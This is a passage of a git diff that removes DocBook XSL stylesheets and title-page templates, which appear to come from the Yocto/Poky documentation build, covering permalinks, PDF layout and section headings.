- <xsl:param name="object" select="."/>
- <xsl:param name="title">
- <xsl:apply-templates select="$object" mode="object.title.markup">
- <xsl:with-param name="allow-anchors" select="1"/>
- </xsl:apply-templates>
- </xsl:param>
- <p class="title">
- <b><xsl:copy-of select="$title"/></b>
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select="$object"/>
- </xsl:call-template>
- </p>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/gloss-permalinks.xsl b/documentation/template/gloss-permalinks.xsl
deleted file mode 100644
index 6bf58116f6..0000000000
--- a/documentation/template/gloss-permalinks.xsl
+++ /dev/null
@@ -1,14 +0,0 @@
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml">
-
- <xsl:template match="glossentry/glossterm">
- <xsl:apply-imports/>
- <xsl:if test="$generate.permalink != 0">
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select=".."/>
- </xsl:call-template>
- </xsl:if>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/permalinks.xsl b/documentation/template/permalinks.xsl
deleted file mode 100644
index d2a1c14524..0000000000
--- a/documentation/template/permalinks.xsl
+++ /dev/null
@@ -1,25 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet version="1.0"
- xmlns="http://www.w3.org/1999/xhtml"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-
- <xsl:param name="generate.permalink" select="1"/>
- <xsl:param name="permalink.text">¶</xsl:param>
-
- <xsl:template name="permalink">
- <xsl:param name="node"/>
-
- <xsl:if test="$generate.permalink != '0'">
- <span class="permalink">
- <a alt="Permalink" title="Permalink">
- <xsl:attribute name="href">
- <xsl:call-template name="href.target">
- <xsl:with-param name="object" select="$node"/>
- </xsl:call-template>
- </xsl:attribute>
- <xsl:copy-of select="$permalink.text"/>
- </a>
- </span>
- </xsl:if>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/poky-db-pdf.xsl b/documentation/template/poky-db-pdf.xsl
deleted file mode 100644
index f8a3df103d..0000000000
--- a/documentation/template/poky-db-pdf.xsl
+++ /dev/null
@@ -1,64 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/current/fo/docbook.xsl" />
-
- <!-- check project-plan.sh for how this is generated, needed to tweak
- the cover page
- -->
- <xsl:include href="/tmp/titlepage.xsl"/>
-
- <!-- To force a page break in document, i.e per section add a
- <?hard-pagebreak?> tag.
- -->
- <xsl:template match="processing-instruction('hard-pagebreak')">
- <fo:block break-before='page' />
- </xsl:template>
-
- <!--Fix for defualt indent getting TOC all wierd..
- See http://sources.redhat.com/ml/docbook-apps/2005-q1/msg00455.html
- FIXME: must be a better fix
- -->
- <xsl:param name="body.start.indent" select="'0'"/>
- <!--<xsl:param name="title.margin.left" select="'0'"/>-->
-
- <!-- stop long-ish header titles getting wrapped -->
- <xsl:param name="header.column.widths">1 10 1</xsl:param>
-
- <!-- customise headers and footers a little -->
-
- <xsl:template name="head.sep.rule">
- <xsl:if test="$header.rule != 0">
- <xsl:attribute name="border-bottom-width">0.5pt</xsl:attribute>
- <xsl:attribute name="border-bottom-style">solid</xsl:attribute>
- <xsl:attribute name="border-bottom-color">#999999</xsl:attribute>
- </xsl:if>
- </xsl:template>
-
- <xsl:template name="foot.sep.rule">
- <xsl:if test="$footer.rule != 0">
- <xsl:attribute name="border-top-width">0.5pt</xsl:attribute>
- <xsl:attribute name="border-top-style">solid</xsl:attribute>
- <xsl:attribute name="border-top-color">#999999</xsl:attribute>
- </xsl:if>
- </xsl:template>
-
- <xsl:attribute-set name="header.content.properties">
- <xsl:attribute name="color">#999999</xsl:attribute>
- </xsl:attribute-set>
-
- <xsl:attribute-set name="footer.content.properties">
- <xsl:attribute name="color">#999999</xsl:attribute>
- </xsl:attribute-set>
-
-
- <!-- general settings -->
-
- <xsl:param name="fop1.extensions" select="1"></xsl:param>
- <xsl:param name="paper.type" select="'A4'"></xsl:param>
- <xsl:param name="section.autolabel" select="1"></xsl:param>
- <xsl:param name="body.font.family" select="'verasans'"></xsl:param>
- <xsl:param name="title.font.family" select="'verasans'"></xsl:param>
- <xsl:param name="monospace.font.family" select="'veramono'"></xsl:param>
-
-</xsl:stylesheet>
diff --git a/documentation/template/qa-code-permalinks.xsl b/documentation/template/qa-code-permalinks.xsl
deleted file mode 100644
index a309095c60..0000000000
--- a/documentation/template/qa-code-permalinks.xsl
+++ /dev/null
@@ -1,23 +0,0 @@
-<!--
-This XSL sheet enables creation of permalinks for <para><code>
-constructs. Right now, this construct occurs only in the ref-manual
-book's qa issues and warnings chapter. However, if the construct
-were to appear anywhere in that ref-manual, a permalink would be
-generated. I don't foresee any <para><code> constructs being used
-in the future but if they are then a permalink with a generically
-numbered permalink would be generated.
--->
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml">
-
- <xsl:template match="para/code">
- <xsl:apply-imports/>
- <xsl:if test="$generate.permalink != 0">
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select=".."/>
- </xsl:call-template>
- </xsl:if>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/section.title.xsl b/documentation/template/section.title.xsl
deleted file mode 100644
index 5c6ff9a96e..0000000000
--- a/documentation/template/section.title.xsl
+++ /dev/null
@@ -1,55 +0,0 @@
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml" exclude-result-prefixes="d">
-
- <xsl:template name="section.title">
- <xsl:variable name="section"
- select="(ancestor::section |
- ancestor::simplesect|
- ancestor::sect1|
- ancestor::sect2|
- ancestor::sect3|
- ancestor::sect4|
- ancestor::sect5)[last()]"/>
-
- <xsl:variable name="renderas">
- <xsl:choose>
- <xsl:when test="$section/@renderas = 'sect1'">1</xsl:when>
- <xsl:when test="$section/@renderas = 'sect2'">2</xsl:when>
- <xsl:when test="$section/@renderas = 'sect3'">3</xsl:when>
- <xsl:when test="$section/@renderas = 'sect4'">4</xsl:when>
- <xsl:when test="$section/@renderas = 'sect5'">5</xsl:when>
- <xsl:otherwise><xsl:value-of select="''"/></xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
-
- <xsl:variable name="level">
- <xsl:choose>
- <xsl:when test="$renderas != ''">
- <xsl:value-of select="$renderas"/>
- </xsl:when>
- <xsl:otherwise>
- <xsl:call-template name="section.level">
- <xsl:with-param name="node" select="$section"/>
- </xsl:call-template>
- </xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
-
- <xsl:call-template name="section.heading">
- <xsl:with-param name="section" select="$section"/>
- <xsl:with-param name="level" select="$level"/>
- <xsl:with-param name="title">
- <xsl:apply-templates select="$section" mode="object.title.markup">
- <xsl:with-param name="allow-anchors" select="1"/>
- </xsl:apply-templates>
- <xsl:if test="$level &gt; 0">
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select="$section"/>
- </xsl:call-template>
- </xsl:if>
- </xsl:with-param>
- </xsl:call-template>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/titlepage.templates.xml b/documentation/template/titlepage.templates.xml
deleted file mode 100644
index f53f147002..0000000000
--- a/documentation/template/titlepage.templates.xml
+++ /dev/null
@@ -1,1227 +0,0 @@
-<!DOCTYPE t:templates [
-<!ENTITY hsize0 "10pt">
-<!ENTITY hsize1 "12pt">
-<!ENTITY hsize2 "14.4pt">
-<!ENTITY hsize3 "17.28pt">
-<!ENTITY hsize4 "20.736pt">
-<!ENTITY hsize5 "24.8832pt">
-<!ENTITY hsize0space "7.5pt"> <!-- 0.75 * hsize0 -->
-<!ENTITY hsize1space "9pt"> <!-- 0.75 * hsize1 -->
-<!ENTITY hsize2space "10.8pt"> <!-- 0.75 * hsize2 -->
-<!ENTITY hsize3space "12.96pt"> <!-- 0.75 * hsize3 -->
-<!ENTITY hsize4space "15.552pt"> <!-- 0.75 * hsize4 -->
-<!ENTITY hsize5space "18.6624pt"> <!-- 0.75 * hsize5 -->
-]>
-<t:templates xmlns:t="http://nwalsh.com/docbook/xsl/template/1.0"
- xmlns:param="http://nwalsh.com/docbook/xsl/template/1.0/param"
- xmlns:fo="http://www.w3.org/1999/XSL/Format"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-
-<!-- ********************************************************************
- $Id: titlepage.templates.xml,v 1.23 2003/12/16 00:30:49 bobstayton Exp $
- ********************************************************************
-
- This file is part of the DocBook XSL Stylesheet distribution.
- See ../README or http://docbook.sf.net/ for copyright
- and other information.
-
- ******************************************************************** -->
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="article" t:wrapper="fo:block"
- font-family="{$title.fontset}">
-
- <t:titlepage-content t:side="recto"
- text-align="center">
-
- <mediaobject/>
-
- <title t:named-template="component.title"
- param:node="ancestor-or-self::article[1]"
- keep-with-next="always"
- font-size="&hsize5;"
- font-weight="bold"/>
-
- <subtitle param:node="ancestor-or-self::article[1]"
- keep-with-next="always"
- font-size="&hsize3;"
- font-weight="bold"
- space-after="0.8em"/>
-
- <corpauthor space-before="0.5em"
- font-size="&hsize3;"/>
- <authorgroup space-before="0.5em"
- font-size="&hsize2;"/>
- <author space-before="0.5em"
- font-size="&hsize2;"
- space-after="0.8em"/>
-
- <email font-size="&hsize2;"/>
-
- <othercredit space-before="0.5em"/>
- <releaseinfo space-before="0.5em"/>
- <copyright space-before="0.5em"/>
- <legalnotice text-align="start"
- margin-left="0.5in"
- margin-right="0.5in"
- font-family="{$body.fontset}"/>
- <pubdate space-before="0.5em"/>
- <para></para>
- <revision space-before="0.5em"/>
- <revhistory space-before="0.5em"/>
- <abstract space-before="0.5em"
- text-align="start"
- margin-left="0.5in"
- margin-right="0.5in"
- font-family="{$body.fontset}"/>
-
- <para></para>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="set" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:named-template="division.title"
- param:node="ancestor-or-self::set[1]"
- text-align="center"
- font-size="&hsize5;"
- space-before="&hsize5space;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"
- text-align="center"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="book" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
-
- <mediaobject/>
-
- <subtitle
- text-align="center"
- font-size="&hsize4;"
- space-before="&hsize4space;"
- font-family="{$title.fontset}"/>
- <corpauthor font-size="&hsize3;"
- keep-with-next="always"
- space-before="2in"/>
- <authorgroup space-before="2in"/>
- <author font-size="&hsize3;"
- space-before="&hsize2space;"
- keep-with-next="always"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- <corpauthor/>
- <authorgroup t:named-template="verso.authorgroup"/>
- <author/>
- <othercredit/>
- <pubdate space-before="1em"/>
- <copyright/>
- <abstract/>
- <legalnotice font-size="8pt"/>
- </t:titlepage-content>
-
- <t:titlepage-separator>
- <fo:block break-after="page"/>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- <fo:block break-after="page"/>
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="part" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:named-template="division.title"
- param:node="ancestor-or-self::part[1]"
- text-align="center"
- font-size="&hsize5;"
- space-before="&hsize5space;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- <subtitle
- text-align="center"
- font-size="&hsize4;"
- space-before="&hsize4space;"
- font-weight='bold'
- font-style='italic'
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="partintro" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- text-align="center"
- font-size="&hsize5;"
- font-weight="bold"
- space-before="1em"
- font-family="{$title.fontset}"/>
- <subtitle
- text-align="center"
- font-size="&hsize2;"
- font-weight="bold"
- font-style="italic"
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="reference" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:named-template="division.title"
- param:node="ancestor-or-self::reference[1]"
- text-align="center"
- font-size="&hsize5;"
- space-before="&hsize5space;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"
- text-align="center"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsynopsisdiv" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsection" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect1" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect2" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect3" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="dedication" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::dedication[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="preface" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::preface[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="chapter" t:wrapper="fo:block"
- font-family="{$title.fontset}">
- <t:titlepage-content t:side="recto" margin-left="{$title.margin.left}">
- <title t:named-template="component.title"
- param:node="ancestor-or-self::chapter[1]"
- font-size="&hsize5;"
- font-weight="bold"/>
-
- <subtitle space-before="0.5em"
- font-style="italic"
- font-size="&hsize2;"
- font-weight="bold"/>
-
- <corpauthor space-before="0.5em"
- space-after="0.5em"
- font-size="&hsize2;"/>
-
- <authorgroup space-before="0.5em"
- space-after="0.5em"
- font-size="&hsize2;"/>
-
- <author space-before="0.5em"
- space-after="0.5em"
- font-size="&hsize2;"/>
-
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="appendix" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:named-template="component.title"
- param:node="ancestor-or-self::appendix[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="section" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect1" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect2" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect3" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect4" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect5" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="simplesect" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="bibliography" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::bibliography[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="bibliodiv" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title t:named-template="component.title"
- param:node="ancestor-or-self::bibliodiv[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize4;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="glossary" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::glossary[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="glossdiv" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title t:named-template="component.title"
- param:node="ancestor-or-self::glossdiv[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize4;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="index" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::index[1]"
- param:pagewide="1"
- margin-left="0pt"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <!-- The indexdiv.title template is used so that manual and -->
- <!-- automatically generated indexdiv titles get the same -->
- <!-- formatting. -->
-
- <t:titlepage t:element="indexdiv" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title t:force="1"
- t:named-template="indexdiv.title"
- param:title="title"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
